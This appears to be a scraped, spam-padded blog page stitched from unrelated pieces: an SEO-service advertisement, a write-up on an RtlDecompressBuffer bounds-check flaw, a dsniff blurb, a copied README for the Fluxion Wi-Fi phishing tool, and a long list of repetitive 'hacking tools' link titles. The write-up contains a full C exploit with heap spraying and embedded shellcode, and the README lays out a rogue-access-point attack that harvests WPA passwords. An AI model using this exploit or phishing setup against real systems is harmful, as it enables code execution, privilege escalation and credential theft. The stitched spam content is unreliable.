29 ago 2020

Domain Authority 50 for your website - Guaranteed Service

We`ll get your website to have Domain Authority 50 or we`ll refund you every
cent

for only 150 usd, you`ll have DA50 for your website, guaranteed

Order it today:
http://www.str8-creative.co/product/moz-da-seo-plan/

thanks
Alex Peters

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:


int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@4

if ( algorithm & algorithm != 1 )
{
if ( algorithm & 0xF0 )
result = -1073741217;
else
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
}
else
{
result = -1073741811;
}
return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder

*/

#include
#include
#include

#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
printf("%s\n\n", msg);
exit(1);
}

PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;

printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);

while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);
}

//map = HeapAlloc(heap, 0, 1*MB);

printf("Aproximated to [%x - %x]\n", map, map+1*MB);


printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);

return map;
}

void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
NTSTATUS ntStat;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

heap = GetProcessHeap();

compressed_sz = estimated_uncompressed_sz = 1*KB;

compressed = HeapAlloc(heap, 0, compressed_sz);

uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


spray(heap);
copy_shellcode();
//landing_sigtrap(1*KB);
printf("Landing ...\n");

ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

switch(ntStat) {
case STATUS_SUCCESS:
printf("decompression Ok!\n");
break;

case STATUS_INVALID_PARAMETER:
printf("bad compression parameter\n");
break;


case STATUS_UNSUPPORTED_COMPRESSION:
printf("unsuported compression\n");
break;

case STATUS_BAD_COMPRESSION_BUFFER:
printf("Need more uncompressed buffer\n");
break;

default:
printf("weird decompression state\n");
break;
}

printf("end.\n");
}

The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
Related links

DSniff


"dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI." read more...

Website: http://www.monkey.org/~dugsong/dsniff/

Continue reading

Fluxion - Set Up Fake AP, Fake DNS, And Create Captive Portal To Trick Users Into Giving You Their Password





Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues.
If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord.

Installation
Read here before you do the following steps.
Download the latest revision
git clone --recursive git@github.com:FluxionNetwork/fluxion.git
Switch to tool's directory
cd fluxion 
Run fluxion (missing dependencies will be auto-installed)
./fluxion.sh
Fluxion is also available in arch
cd bin/arch
makepkg
or using the blackarch repo
pacman -S fluxion

Changelog
Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here.

How it works
  • Scan for a target wireless network.
  • Launch the Handshake Snooper attack.
  • Capture a handshake (necessary for password verification).
  • Launch Captive Portal attack.
  • Spawns a rogue (fake) AP, imitating the original access point.
  • Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal.
  • Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key.
  • Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP.
  • All authentication attempts at the captive portal are checked against the handshake file captured earlier.
  • The attack will automatically terminate once a correct key has been submitted.
  • The key will be logged and clients will be allowed to reconnect to the target access point.
  • For a guide to the Captive Portal attack, read the Captive Portal attack guide

Requirements
A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended.

Related work
For development I use vim and tmux. Here are my dotfiles

Credits
  1. l3op - contributor
  2. dlinkproto - contributor
  3. vk496 - developer of linset
  4. Derv82 - @Wifite/2
  5. Princeofguilty - @webpages and @buteforce
  6. Photos for wiki @http://www.kalitutorials.net
  7. Ons Ali @wallpaper
  8. PappleTec @sites
  9. MPX4132 - Fluxion V3

Disclaimer
  • Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.
  • The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

Note
  • Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware.
  • Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately

Links
Fluxion website: https://fluxionnetwork.github.io/fluxion/
Discord: https://discordapp.com/invite/G43gptk
Gitter: https://gitter.im/FluxionNetwork/Lobby




Related posts
  1. Pentest Tools Bluekeep
  2. Hacking Tools 2019
  3. Pentest Tools Website
  4. Beginner Hacker Tools
  5. How To Hack
  6. Android Hack Tools Github
  7. Best Pentesting Tools 2018
  8. Hacker Hardware Tools
  9. Hacker Tools Github
  10. Hacker Tools For Pc
  11. Hacking Tools Software
  12. Usb Pentest Tools
  13. Hacking Tools Software
  14. Hacker Tools 2019
  15. World No 1 Hacker Software
  16. Pentest Tools Find Subdomains
  17. Hacking Tools For Mac
  18. Hacker Tools Free
  19. Hacking Tools For Beginners
  20. Hacking Apps
  21. Hacking Tools For Games
  22. Hacker Tools Mac
  23. Hacker Tool Kit
  24. Computer Hacker
  25. Pentest Tools Github
  26. Hacker Tools Windows
  27. Hacks And Tools
  28. How To Make Hacking Tools
  29. Hacking Tools Kit
  30. Hackers Toolbox
  31. Pentest Tools List
  32. Hacking Tools Download
  33. Hack Tools Download
  34. Pentest Box Tools Download
  35. Pentest Tools
  36. Pentest Tools Windows
  37. Ethical Hacker Tools
  38. Hack Tool Apk
  39. Underground Hacker Sites
  40. Hacker Tool Kit
  41. Pentest Tools Android
  42. Underground Hacker Sites
  43. Pentest Automation Tools
  44. Hack Tools For Pc
  45. Hacker Hardware Tools
  46. Hack Tools Online
  47. Tools 4 Hack
  48. Ethical Hacker Tools
  49. Free Pentest Tools For Windows
  50. Free Pentest Tools For Windows
  51. Hacking Tools 2019
  52. Hacking Tools Kit
  53. Kik Hack Tools
  54. Android Hack Tools Github
  55. Pentest Tools Website Vulnerability
  56. Pentest Tools Website
  57. Black Hat Hacker Tools
  58. Hacking Tools For Mac
  59. Hacker Techniques Tools And Incident Handling
  60. Hacker Tools Windows
  61. Tools For Hacker
  62. Pentest Tools Open Source
  63. Hacking Tools 2020
  64. Hacker Tools Free Download
  65. Hacker Tools Apk Download
  66. Hacker Tools For Mac
  67. Hacking Tools 2019
  68. Hacking Tools Online
  69. Hacking Tools For Beginners
  70. Pentest Tools Linux
  71. Hacking Tools Github
  72. Pentest Box Tools Download
  73. Hacker Tools Windows
  74. Hacks And Tools
  75. Hacker Tools Linux
  76. Hacker Tools Software
  77. Pentest Tools For Mac
  78. Black Hat Hacker Tools
  79. Hacker Tools
  80. Hacking Tools Pc
  81. Pentest Tools List
  82. Pentest Box Tools Download
  83. Pentest Tools Website
  84. Beginner Hacker Tools
  85. Free Pentest Tools For Windows
  86. Hack Tools For Mac
  87. Hacker Tools Free Download
  88. Hacking App
  89. Hacker Search Tools
  90. Pentest Tools For Android
  91. Pentest Tools For Mac
  92. Hack Tools 2019
  93. Beginner Hacker Tools
  94. Hack Tools
  95. Pentest Tools Android
  96. Pentest Tools For Windows
  97. Hack Tools For Games
  98. Hacker Tools Github
  99. Hack Tools Github
  100. Hacker Tools For Pc
  101. Tools Used For Hacking
  102. Hack Apps
  103. Underground Hacker Sites
  104. Hacker Tools
  105. Pentest Tools Github
  106. Hack Tools
  107. What Are Hacking Tools
  108. Hacking Tools And Software
  109. Pentest Tools Find Subdomains
  110. Blackhat Hacker Tools